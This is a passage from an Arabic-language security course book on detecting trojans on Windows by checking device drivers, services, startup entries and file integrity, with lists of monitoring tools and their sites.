‫ﻋن ﻛل ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة)‪ (device driver‬اﻟﻣوﺟود ﻓﻲ اﻟﻘﺎﺋﻣﺔ ﻣﺛل ﻋﻧوان ﺗﺣﻣﯾل ﺑرﻧﺎﻣﺞ اﻟﺗﺷﻐﯾل‪ ،‬اﻟوﺻف‪ ،‬اﻹﺻدار‪ ،‬اﺳم اﻟﻣﻧﺗﺞ‪،‬‬
‫اﻟﺷرﻛﺔ اﻟﺗﻲ أﻧﺷﺋﺗﮫ‪ ،‬اﻟﺦ‪ .‬ﺑدﻻ ﻣن اﻟﺗﺻﻔﺢ ﻟﻣﻛوﻧﺎت اﻟﻧظﺎم ﺑﺷﻛل ﻣﻧﻔﺻل ﻓﻲ ﻟوﺣﺔ اﻟﺗﺣﻛم‪ ،‬ﻓﻘط ﻋن طرﯾﻖ ﺗﺷﻐﯾل ھذا اﻟﺗطﺑﯾﻖ ﻋﻠﻰ اﻟﻧظﺎم‬
‫اﻟﺧﺎص ﺑك ﯾﻣﻛﻧك ﺑﺳﮭوﻟﺔ ﻣﻌرﻓﺔ ﺟﻣﯾﻊ ‪ drivers‬اﻟﻣوﺟودة ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﯾﻌرض ھذا اﻟﺗطﺑﯾﻖ ﻗﺎﺋﻣﺔ ﺑﺑراﻣﺞ اﻟﺗﺷﻐﯾل اﻟﻣوﺟودة‬
‫ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺑﺳرﻋﺔ وﺳﮭوﻟﺔ‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن إﻧﺷﺎء ﺗﻘﺎرﯾر ‪.HTML‬‬

544
Device Drivers Monitoring Tools

:‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن أدوات رﺻد ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة واﻟﺗﻲ ﺗﺳﺎﻋد ﻓﻲ اﻟﻛﺷف ﻋن ﺣﺻﺎن طروادة ﻛﺎﻻﺗﻰ‬
Driver Detective available at http://www.drivershq.com
Unknown Device Identifier available at http://www.zhangduo.com
DriverGuide Toolkit available at http://www.driverguidetoolkit.com
DriverMax available at http://www.innovative-sol.com
Driver Magician available at http://www.drivermagician.com
Driver Reviver available at http://www.reviversoft.com
DriverScanner available at http://www.uniblue.com
Double Driver available at http://www.boozet.org
My Drivers available at http://www.zhangduo.com
DriverEasy available at http://www.drivereasy.com
Scanning For Suspicious Windows Services
‫ ﯾﺻﺑﺢ ﻣن اﻟﺳﮭل ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺗﺷﻐﯾل اﻟﻧظﺎم ﻣن ﻣوﻗﻊ‬، (windows service)‫ﺑﻣﺟرد ﯾﺗم ﺗﺛﺑﯾت ﺣﺻﺎن طروادة ﻋﻠﻰ ﺧدﻣﺎت وﯾﻧدوز‬
‫ ﻣﻊ ﻣﺳﺎﻋدة ﻣن أدوات‬.‫ أﺣﺻﻧﺔ طروادة أﯾﺿﺎ ﺗﻘوم ﺑﺈﻧﺷﺎء ﻋﻣﻠﯾﺎﺗﮭﺎ ﻟﺗﺑدو وﻛﺄﻧﮭﺎ ﺣﻘﯾﻘﯾﺔ ﻣﺛل ﺧدﻣﺎت اﻟوﯾﻧدوز ﻣن أﺟل ﺗﺟﻧب اﻟﻛﺷف‬.‫ﺑﻌﯾد‬
.‫ ﯾﻣﻛﻧك اﻟﻛﺷف ﻋن ﺣﺻﺎن طروادة‬،‫اﻟرﺻد ﺧدﻣﺎت وﯾﻧدوز‬
‫ أﺣﺻﻧﺔ طروادة ﺗﻌﯾد‬.‫أﺣﺻﻧﺔ طروادة اﻟﺗﻲ ﺗﻧﺷﺎ ﺧدﻣﺎت وﯾﻧدوز ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻟﺗﺣﻛم ﻋن ﺑﻌد ﺑﺎﻟﺟﮭﺎز اﻟﮭدف وﺗﻣرﯾر ﺗﻌﻠﯾﻣﺎت ﺧﺑﯾﺛﺔ‬
‫ ﻟﻠﺗﻼﻋب ﺑﻣﻔﺗﺎح‬rootkit ‫ أﺣﺻﻧﺔ طروادة ﺗوظف ﺗﻘﻧﯾﺎت‬.‫ ﺣﻘﯾﻘﯾﺔ ﻣن أﺟل ﺗﺟﻧب اﻟﻛﺷف‬Windows ‫ﺗﺳﻣﯾﺔ ﻋﻣﻠﯾﺎﺗﮭﺎ ﻟﺗﺑدو وﻛﺄﻧﮭﺎ ﺧدﻣﺔ‬
.‫ ﻹﺧﻔﺎء ﻋﻣﻠﯾﺗﮭﺎ‬HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services (registry key) ‫اﻟﺳﺟل‬

545
Windows Services Monitoring Tool: Windows Service Manager (SrvMan)

http://tools.sysprogs.org/srvman :‫اﻟﻣﺻدر‬
‫ ھذا ﯾﻣﻛﻧﮫ ﺗوﻟﯾد‬.‫ ھو اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﻌﻣل اﺧﺗﺻﺎر ﻟﺟﻣﯾﻊ اﻟﻣﮭﺎم اﻟﻌﺎﻣﺔ اﻟﻣرﺗﺑطﺔ ﺧدﻣﺎت وﯾﻧدوز‬Windows Service Manager
‫ ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ إﻟﻐﺎء اﻟﺧدﻣﺎت واﻟﺗﻼﻋب ﺑﺧدﻣﺎت‬.‫ ﺑدون إﯾﻘﺎف أو إﻋﺎدة ﺗﺷﻐﯾل اﻟوﯾﻧدوز‬Legacy drivers‫ و‬Win32 ‫ﺧدﻣﺎت ﻣﺧﺗﻠﻔﺔ ل‬
‫ ﻓﺈﻧﮫ ﯾﻣﻛن أﯾﺿﺎ أن ﺗﺳﺗﺧدم ﻟﺗﺷﻐﯾل ﺗطﺑﯾﻘﺎت‬.‫ اﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ وﺿﻌﯾن واﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ وواﺟﮫ ﺳطر اﻷواﻣر‬.‫اﻻﻋداد اﻷﺧرى‬
.Windows ‫ ﺑت ﻣن‬64‫ ﺑت و‬32 ‫ وھو ﯾدﻋم ﻛل ﻣن‬.‫ ﻛﺄﻧﮭﺎ ﺧدﻣﮫ‬Win32
Other Windows Services Monitoring Tools

‫ وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن أدوات‬.‫أدوات رﺻد ﺧدﻣﺎت اﻟوﯾﻧدوز ﺗﺳﺗﺧدم ﻟﻣراﻗﺑﺔ ﺧدﻣﺎت وﯾﻧدوز اﻟﺣرﺟﺔ وإﻋﺎدة ﺗﺷﻐﯾﻠﮭﺎ اﺧﺗﯾﺎرﯾﺎ ﻓﻲ ﺣﺎﻟﺔ ﻓﺷﻠﮭﺎ‬
:‫ اﻟﺗﻲ ﺗﺗواﻓر ﺑﺳﮭوﻟﺔ ﻓﻲ اﻟﺳوق ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‬Windows ‫اﻟرﺻد ﻟﺧدﻣﺔ‬
Smart Utility available at http://www.thewindowsclub.com
Netwrix Service Monitor available at http://www.netwrix.com
Vista Services Optimizer available at http://www.smartpcutilities.com
ServiWin available at http://www.nirsoft.net
Windows Service Manager Tray available at http://winservicemanager.codeplex.com
AnVir Task Manager available at http://www.anvir.com
Process Hacker available at http://processhacker.sourceforge.net
Free Windows Service Monitor Tool available at http://www.manageengine.com
Overseer Network Monitor available at http://www.overseer-network-monitor.com
Total Network Monitor available at http://www.softinventive.com

‫‪546‬‬
‫‪Scanning For Suspicious Startup Programs‬‬
‫أﺣﺻﻧﺔ طروادة‪ ،‬ﺑﻣﺟرد ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﻓﺈﻧﮭﺎ ﺗﺑدأ ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺑدء ﺗﺷﻐﯾل اﻟﻧظﺎم‪ .‬ﻟذﻟك‪ ،‬ﻓﺣص ﺑراﻣﺞ ﺑدء اﻟﺗﺷﻐﯾل اﻟﻣﺷﺑوھﺔ‬
‫ﺿروري ﺟدا ﻟﻠﻛﺷف ﻋن ﺣﺻﺎن طروادة‪ .‬ﺑﺎﺗﺑﺎع ھذه اﻟﺧطوات اﻟﺑﺳﯾطﺔ‪ ،‬ﯾﻣﻛﻧك ﺗﺣدﯾد ﻣﺎ إذا ﻛﺎن ھﻧﺎك أي ﻣن أﺣﺻﻧﺔ طروادة اﻟﻣﺧﻔﯾﺔ‪:‬‬
‫اﻟﺧطوة اﻷوﻟﻰ ھﻲ ﻓﺣص ﻣﺟﻠد ‪startup‬‬ ‫‪-‬‬

‫‪C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup‬‬
‫‪C:\Users\ (User-Name) \AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup‬‬
‫ﻓﺣص اﻟﺧدﻣﺎت اﻟﺗﻲ ﺗﺑدأ اﻟﻌﻣل اﻟﯾﺎ ﻋﻧد ﺑدء ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل‬ ‫‪-‬‬
‫‪Go to Run, type services.msc, and click Sort by Startup Type‬‬
‫ﻓﺣص إدﺧﺎﻻت ﺑراﻣﺞ ﺑدء اﻟﺗﺷﻐﯾل ﻓﻲ ﻣﻠف ‪.registry‬‬ ‫‪-‬‬
‫ﻓﺣص ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة )‪ (device driver‬اﻟﺗﻲ ﺗﺑدأ اﻟﺗﺣﻣﯾل اﻟﯾﺎ‪.‬‬ ‫‪-‬‬
‫‪C:\Windows\System32\drivers‬‬
‫‪Check boot.ini or bcd (bootmgr) entries.‬‬
‫‪Windows8 Startup Registry Entries‬‬

‫اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﺗﻌﻣل اﻟﯾﺎ ﻋﻧد ﺑداﯾﺔ ﺗﺷﻐﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻣﻛﻧك اﯾﺟﺎدھﺎ ﻓﻲ ادﺧﺎﻻت ﻣﻠف ‪ registry‬ﻛﺎﻻﺗﻰ‪:‬‬
‫‪Startup Programs Monitoring Tool: Starter‬‬

‫‪ Starter‬ﯾﺳﻣﺢ ﻟك ﺑﻌرض وإدارة ﺟﻣﯾﻊ اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗﺑدأ ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧدﻣﺎ ﯾﺗم ﺗﺣﻣﯾل ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ﻓﺈﻧﮫ ﯾﻘوم ﺑﺗﻌداد ﻛﺎﻓﺔ إدﺧﺎﻻت ‪registry‬‬
‫اﻟﻣﺧﻔﯾﺔ‪ ،‬وﻋﻧﺎﺻر ﻣﺟﻠدات ﺑدء اﻟﺗﺷﻐﯾل وﺑﻌض ﻣﻠﻔﺎت اﻟﺗﮭﯾﺋﺔ‪ ،‬ﺑﺣﯾث ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدم اﺧﺗﯾﺎر اﻹدﺧﺎﻻت اﻟﻣﺣددة ﻟﺗﻌطﯾﻠﮭﺎ ﻣؤﻗﺗﺎ‪ ،‬وﺗﺣرﯾرھﺎ‪،‬‬
‫وإﻧﺷﺎء ﺟدﯾده‪ ،‬أو ﺣذﻓﮭﺎ ﻧﮭﺎﺋﯾﺎ‪.‬‬
‫‪ Starter‬ﯾﻣﻛﻧﮫ أﯾﺿﺎ ﺳرد ﻛﺎﻓﺔ اﻟﻌﻣﻠﯾﺎت اﻟﺟﺎرﯾﺔ وﻣﻊ اﻟﺗﻐﯾﯾر اﻟﻰ ‪ view‬ﯾﻣﻛﻧﮫ ﻋرض ﻣﻌﻠوﻣﺎت ﻣوﺳﻌﮫ ﻋن اﻟﻌﻣﻠﯾﺎت ﻣﺛل ﻣﻠﻔﺎت ‪DLL‬‬
‫اﻟﻣﺳﺗﺧدﻣﺔ‪ ،‬اﺳﺗﺧدام اﻟذاﻛرة‪ ،‬ﻋدد ‪ ،threats‬واﻷوﻟوﯾﺎت‪ ،‬اﻟﺦ‪ ،‬وإﻧﮭﺎء اﻟﻌﻣﻠﯾﺔ اﻟﻣﺣددة‪ .‬ﯾدﻋم ﻣﺎﯾﻛروﺳوﻓت وﯾﻧدوز ‪،NT ،ME ،x9‬‬
‫‪ ،2003 ،XP ،2000‬وﻓﯾﺳﺗﺎ‪ .‬ﻻ ﺗوﺟد ﻣﺗطﻠﺑﺎت ﻣﺣددة ﻟﺗﺷﻐﯾﻠﮫ ﻣﺎ ﻋدا واﺣدة‪ :‬ﺣﯾث ﻗد ﯾﺗطﻠب ‪ registry operations‬ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل‬
‫اﻟﻣﺳﺗﻧدة إﻟﻰ ‪-Windows NT‬واﻟﺗﻲ ﺗﺗطﻠب ﺣﻘوق وﺻول ﺧﺎﺻﺔ‪.‬‬

547
Startup Programs Monitoring Tool: Security AutoRun

http://tcpmonitor.altervista.org :‫اﻟﻣﺻدر‬
‫ ﯾﺗم ﺳرد ﻛل ﺗطﺑﯾﻖ ﻣﻊ‬.‫ ﯾﺳﻣﺢ ﻟك ﻟﻌرض ﻗﺎﺋﻣﺔ ﻣن ﺟﻣﯾﻊ اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﯾﺗم ﺗﺣﻣﯾﻠﮭﺎ ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺑدء ﺗﺷﻐﯾل وﯾﻧدوز‬Security AutoRun
،‫ وإﺻدار اﻟﻣﻠف‬،‫ اﺳم اﻟﻣﻧﺗﺞ‬،command-line string ،drivers ‫ ﻗﺎﺋﻣﺔ‬،‫ اﻟﺧدﻣﺎت‬،common/user ،registry ،‫ﺗﻔﺎﺻﯾل ﻋن ﻧوﻋﮫ‬
‫ أﻧظﻣﺔ‬.‫ اﻟﺗﻲ ﺗﻌﻣل ﻋﻧد ﺑدء اﻟﺗﺷﻐﯾل‬adware ‫ وﯾﺣدد ﺑراﻣﺞ اﻟﺗﺟﺳس أو‬.‫ وأﻛﺛر ﻣن ذﻟك‬،‫اﺳم اﻟﺷرﻛﺔ واﻟﻣوﻗﻊ ﻓﻲ ﻧظﺎم اﻟﺳﺟل أو اﻟﻣﻠف‬
.x9/ME/NT/2000/XP/Vista/7 ‫ﺗﺷﻐﯾل اﻟوﯾﻧدوز اﻟﻣﺗواﻓﻘﺔ ھﻲ‬
Other Startup Programs Monitoring Tools

:‫ﻓﯾﻣﺎ ﯾﻠﻲ ﻗﺎﺋﻣﺔ ﺑﺄدوات ﺑراﻣﺞ رﺻد ﺑرﻣﺟﯾﺎت ﺑدء اﻟﺗﺷﻐﯾل ﻛﻣﺎ ﯾﻠﻲ‬
Absolute Startup manager available at http://www.absolutestartup.com
Activestartup available at http://www.hexilesoft.com

‫‪548‬‬
‫‪StartEd Lite available at http://www.outertech.com‬‬

‫‪Startup Inspector available at http://www.windowsstartup.com‬‬
‫‪Autoruns for Windows available at http://technet.microsoft.com‬‬
‫‪Program Starter available at http://www.ab-tools.com‬‬
‫‪Disable Startup available at http://www.disablestartup.com‬‬
‫‪StartupMonitor available at http://www.mlin.net‬‬
‫‪Chameleon Startup Manager available at http://www.chameleon-managers.com‬‬
‫‪Startup Booster available at http://www.smartpctools.com‬‬
‫‪Scanning for Suspicious Files and Folders‬‬
‫ﻋﺎدة ﻋﻧدﻣﺎ ﯾﺻﺎب اﻟﻧظﺎم ﻋن طرﯾﻖ ﺣﺻﺎن طروادة‪ ،‬ﻓﺈﻧﮫ ﯾﻘوم ﺑﺗﻌدﯾل اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات؛ ﯾﻣﻛﻧك ﻓﺣص اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات ﻣﻊ اﻷدوات‬
‫اﻟﺗﺎﻟﯾﺔ ﻣن أﺟل اﻟﻛﺷف ﻋن ﺗﺛﺑﯾت ﺣﺻﺎن طروادة‪.‬‬
‫‪FSIV -‬‬
‫)‪ File Checksum Integrity Verifier (FCIV‬ھﻲ اﻷداة اﻟﺗﻲ ﯾﻣﻛن أن ﺗﺳﻣﺢ ﻟك ﻟﺗوﻟﯾد ﻗﯾم ھﺎش ﻣن اﻟﻧوع ‪ MD5‬أو ‪SHA-1‬‬
‫ﻟﻠﻣﻠﻔﺎت اﻟﺗﻲ ﯾﻣﻛن اﻟﺗﺣﻘﻖ ﻣﻧﮭﺎ ﻣﻘﺎرﻧﺔ ﺑﺎﻟﻘﯾم اﻟﻘﯾﺎﺳﯾﺔ ﻟﺗﺣدﯾد أي ﺗﻐﯾﯾر؛ ﻓﺈذا وﺟدت‪ ،‬ﯾﻣﻛﻧك ﺗﺷﻐﯾل اﻟﺗﺣﻘﻖ ﻣن ﻣﻠﻔﺎت ﻧظﺎم اﻟﻣﻠﻔﺎت ﺿد ﻗﺎﻋدة‬
‫ﺑﯾﺎﻧﺎت ‪ XML‬ﻟﺗﺣدﯾد أي ﻣن اﻟﻣﻠﻔﺎت ﺗم ﺗﻌدﯾﻠﮫ‪ .‬ﺑل ھو أداة ﺳطر أواﻣر اﻟﺗﻲ ﺗﺣﺳب وﺗﺗﺣﻘﻖ ﻣن اﻟﻘﯾم اﻟﮭﺎش اﻟﻣﺷﻔرة ﻟﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت اﻟﮭﺎﻣﺔ‬
‫اﻟﺧﺎﺻﺔ ﺑك وﯾﺣﻔظ اﻟﻘﯾم ﻓﻲ ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﻣﻠف ‪.XML‬‬
‫‪C:\ CIV>fciv\.exe c:\hash.txt‬‬
‫‪// File Checksum Integrity Verifier version 2 .05.‬‬
‫‪//‬‬
‫‪6b1fb2f76c139c82253732e1c8824cc2 c:\hash.txt‬‬
‫‪Tripwire -‬‬
‫اﻟﻣﺻدر‪http://www.tripwire.com :‬‬
‫‪ Tripwire Enterprise‬ﯾوﻓر ﻗدرات اﻟﺗﺣﻛم ﻓﻲ اﻻﻋداد اﻟﺗﻲ ﺗﺣﺗﺎﺟﮭﺎ اﻟﻣﻧظﻣﺎت ﻟﺗﺄﻣﯾن اﻟﺑﻧﯾﺔ اﻟﺗﺣﺗﯾﺔ ﺑﺷﻛل اﺳﺗﺑﺎﻗﻲ ﻛﺎﻣل وﺿﻣﺎن‬
‫اﻻﻣﺗﺛﺎل ﻟﻠﺳﯾﺎﺳﺎت اﻟداﺧﻠﯾﺔ واﻟﻠواﺋﺢ واﻟﻣﻌﺎﯾﯾر وﻣﻌﺎﯾﯾر اﻟﺻﻧﺎﻋﺔ‪.‬‬
‫‪SIGVERIF -‬‬
‫اﻟﻣﺻدر‪ http://books.google.co.in :‬و ‪http://books.google.com‬‬
‫‪ SIGVERIF‬ھﻲ أداة ﻟﻠﺗﺣﻘﻖ ﻣن اﻟﺗوﻗﯾﻊ )‪ (signature‬اﻟذي ﯾﺳﻣﺢ ﻟك ﻹﯾﺟﺎد ﺑراﻣﺞ اﻟﺗﺷﻐﯾل اﻟﻣوﻗﻌﺔ وﻏﯾر اﻟﻣوﻗﻌﺔ ﻣﺗﺻﻼ ﺑﺎﻟﻧظﺎم‪ .‬ﻋﻧد‬
‫اﻟﻌﺛور ﻋﻠﻰ أي ﻣن ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل ﻏﯾر ﻣوﻗﻊ‪ ،‬ﯾﻣﻛﻧك ﻧﻘل ذﻟك اﻟﻰ ﻣﺟﻠد ﺟدﯾد وإﻋﺎدة ﺗﺷﻐﯾل اﻟﻧظﺎم واﺧﺗﺑﺎر اﻟﺑرﻧﺎﻣﺞ وظﯾﻔﺔ ﻋن اﻷﺧطﺎء‪.‬‬
‫ﻓﯾﻣﺎ ﯾﻠﻲ ﺧطوات ﻟﺗﺣدﯾد ﺑراﻣﺞ اﻟﺗﺷﻐﯾل اﻟﻐﯾر ﻣوﻗﻌﺔ‪:‬‬
‫‪ -‬ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ Start‬ﺛم اﻟﻧﻘر ﻓوق ‪ RUN‬او ﯾﻣﻛن اﺧﺗﺻﺎر ذﻟك ﺑﺎﻟﻧﻘر ﻓوق زر ‪ WINDOWS+R‬ﺛم ﻛﺗﺎﺑﺔ ‪،SIGVERIF‬‬
‫ﺛم اﻟﻧﻘر ﻓوق ‪ .OK‬ﻓﺗؤدى اﻟﻰ ظﮭور ﺷﺎﺷﮫ ﻣﺛل ھذه‪.‬‬

‫‪549‬‬
‫‪ -‬ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪.start‬‬

‫ﺑﻌد اﻧﺗﮭﺎء ‪ ،SIGVERIF‬ﻓﺈﻧﮫ ﯾﺗﺣﻘﻖ ﻣن ﻛﺎﻓﺔ ﺑراﻣﺞ اﻟﺗﺷﻐﯾل اﻟﻐﯾر ﻣوﻗﻌﺔ ﺛم ﯾﺗم ﻋرض ﻗواﺋم ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪Investigator .‬‬
‫ﯾﻣﻛﻧﮫ اﻟﻌﺛور ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻋن ﻛﺎﻓﺔ ﺑراﻣﺞ اﻟﺗﺷﻐﯾل اﻟﻣوﻗﻌﺔ واﻟﻐﯾر ﻣوﻗﻌﺔ اﻟﺗﻲ وﺟدت ﻣن ﻗﺑل ‪ SIGVERIF‬ﻓﻲ ‪ sigverif.txt‬ﻓﻲ‬
‫اﻟﻣﺟﻠد ‪ ،%windir%‬وﻋﺎدة ‪ WINNT‬أو ﻣﺟﻠد اﻟوﯾﻧدوز‪.‬‬
‫‪Files and Folder Integrity Checker: FastSum and Winmd5‬‬
‫ﻓﺣص ﺳﻼﻣﺔ اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات )‪ (files and folder integrity checker‬ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ ﺳﻼﻣﺔ اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات واﻟﺗﺣﻘﻖ ﻣن‬
‫وﺟود أﯾﺔ ﺗﻐﯾﯾرات ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﮭﺎﻣﺔ‪ ،‬ﻣﺷﯾرا إﻟﻰ ﻣﺣﺎوﻻت اﻟﺗﺳﻠل اﻟﻣﺣﺗﻣﻠﺔ‪ .‬ھذه اﻟﻌﻣل ﯾﺗم ﻣﻊ ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻷﻣﻧﯾﺔ ﻟﺗوﻓﯾر اﻟﺣل‬
‫اﻟﻛﺎﻣل ﻟﻠﺗدﻗﯾﻖ واﻟﻔﺣص ﻷﻧظﻣﺔ ‪ OSS‬و‪.Guardian file systems‬‬
‫‪FastSum‬‬
‫اﻟﻣﺻدر‪http://www.fastsum.com :‬‬
‫‪ FastSum‬ﺗم ﺑﻧﺎﺋﮫ ﻋﻠﻰ ﺧوارزﻣﯾﺔ ‪ ، (MD5 checksum algorithm) MD5‬واﻟذي ﯾﺳﺗﺧدم ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﻌﺎﻟم ﻟﻠﺗﺣﻘﻖ ﻣن ﺳﻼﻣﺔ‬
‫اﻟﻣﻠﻔﺎت‪ .‬ﯾﻣﻛﻧك اﻟﺳﯾطرة ﻋﻠﻰ اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ ﺑك ﻣﻊ ‪ .FastSum‬ﻗم ﺑﺈﻧﺷﺎء ﺑﺻﻣﺎت اﻟﻣﻠﻔﺎت )‪(fingerprint‬ﻟﻠﻣﻠﻔﺎت اﻟﮭﺎﻣﺔ اﻟﺧﺎﺻﺔ ﺑك‬
‫اﻵن ﺛم ﺗﺣﻘﻖ ﻣن اﻟﺳﻼﻣﺔ ﺑﻌد اﻟﻧﻘل ﻋﺑر اﻟﺷﺑﻛﺔ أو ﺣرق ‪ CD‬وﯾﺗم ذﻟك ﺑﺑﺳﺎطﺔ ﻋن طرﯾﻖ أﺧذ اﻟﺑﺻﻣﺎت ﻣرة أﺧرى وﻣﻘﺎرﻧﺗﮭﺎ ﻣﻊ ﺗﻠك اﻟﺗﻲ‬
‫ﺗم إﻧﺷﺎﺋﮭﺎ ﺳﺎﺑﻘﺎ‪ .‬ﺑﻧﻔس اﻟطرﯾﻘﺔ‪ ،‬ﯾﻣﻛﻧك أن ﺗﻛﺗﺷف أﯾﺿﺎ ﻣﺎ إذا ﻛﺎن ﻗد ﺗﻌرﺿت اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك ﻟﻠﺗﻠف ﻋن طرﯾﻖ اﻟﻔﯾروﺳﺎت‪ ،‬وﻗﺿﺎﯾﺎ‬
‫اﻟﺷﺑﻛﺔ‪ ،‬أو اﻟﻔﺷل ﺣرق ‪.CD/DVD‬‬
‫ھذه اﻷداة ﺗﺷﺑﮫ اﻟﻰ ﺣد ﻛﺑﯾر اﻟﻰ اداه ﺳطر أواﻣر ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻟﯾﻧﻛس وھﻲ ‪.md5sum‬‬
‫‪WinMD5‬‬
‫اﻟﻣﺻدر‪http://www.blisstonia.com :‬‬
‫‪ WinMD5 v2.0‬ھو أداة وﯾﻧدوز )‪ ،2000‬إﻛس ﺑﻲ‪ ،‬ﻓﯾﺳﺗﺎ‪ (7 ،‬ﻟﺣﺳﺎب ھﺎش ‪ ("fingerprint") MD5‬ﻣن اﻟﻣﻠﻔﺎت‪ .‬ﻛﻣﺎ أﻧﮫ ﯾﺟﻌل ﻣن‬
‫اﻟﺳﮭل ﻟﻠﻐﺎﯾﺔ ﻣﻘﺎرﻧﺔ اﻟﺑﺻﻣﺎت ﺿد اﻟﺑﺻﻣﺎت اﻟﺻﺣﯾﺣﺔ اﻟﻣﺧزﻧﺔ ﻓﻲ ﻣﻠف ‪ .MD5SUM‬رﯾدھﺎت‪ ،‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﯾوﻓر ﻣﻠﻔﺎت‬
‫‪ MD5SUM‬ﻟﺟﻣﯾﻊ اﻟﻣﻠﻔﺎت اﻟﻛﺑﯾر اﻟﺗﻲ ﺗﺣﻣﻠﮭﺎ‪ .‬ھذه اﻟﺑﺻﻣﺎت ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﺗﺄﻛد ﻣن أن اﻟﻣﻠف اﻟﺧﺎص ﺑك ﻏﯾر ﻓﺎﺳده‪.‬‬

‫‪550‬‬
‫‪Files and Folder Integrity Checker‬‬
‫اﻟﺗﺣﻖ ﻣن ﻧزاھﺔ اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات ﺗﻘوم دوﻣﺎ ﺑﻣراﻗﺑﺔ ﺳﻼﻣﺔ اﻟﻣﻠﻔﺎت وﺗﺣدﯾد أي ﻣن اﻟﺗﻐﯾﯾرات اﻟﺗﻲ ﺗﺣدث ﻓﻲ اﻟﻣﻠﻔﺎت اﻟﮭﺎﻣﺔ واﻟﺗﻲ ﻣﻧﮭﺎ‬
‫ﯾﺣﺎول أن ﯾﻠﻣﺢ اﻟﻰ وﺟود ﺗدﺧل ﻣﺣﺗﻣل‪ .‬ﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن اﻷدوات اﻷﺧرى اﻟﺗﻲ ﺗﺳﺗﺧدم ﻟﻠﺗﺣﻘﻖ ﻣن ﺳﻼﻣﺔ اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات ﻛﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪Advanced Checksum Verifier (ACSV) available at http://www.irnis.net‬‬
‫‪Fsum Fronted available at http://fsumfe.sourceforge.net‬‬
‫‪Verisys available at http://www.ionx.co.uk‬‬
‫‪AFICK (Another File Integrity Checker) available at http://afick.sourceforge.net‬‬
‫‪File Integrity Monitoring available at http://www.ncircle.com‬‬
‫‪Attribute Manager available at http://www.miklsoft.com‬‬
‫‪PA File Sight available at http://www.poweradmin.com‬‬
‫‪CSP File Integrity Checker available at http://www.tandemsecurity.com‬‬
‫‪ExactFiIe available at http://www.exactfile.com‬‬
‫‪OSSEC available at http://www.ossec.net‬‬
‫‪SCANNING FOR SUSPICIOUS NETWORK ACTIVITIES‬‬
‫ﺑﻌد ھﺟوم اﻟﺑراﻣﺞ اﻟﺿﺎرة‪ ،‬ﻓﺎن ﺣﺻﺎن طروادة ﯾﺑدأ ﻓﻲ إرﺳﺎل اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ اﻟﻣوﺟودة ﻋﻠﻰ اﻟﻧظﺎم إﻟﻰ اﻟﻣﮭﺎﺟﻣﯾن‪ .‬ﺗﻌﺎد أﺣﺻﻧﺔ طروادة‬
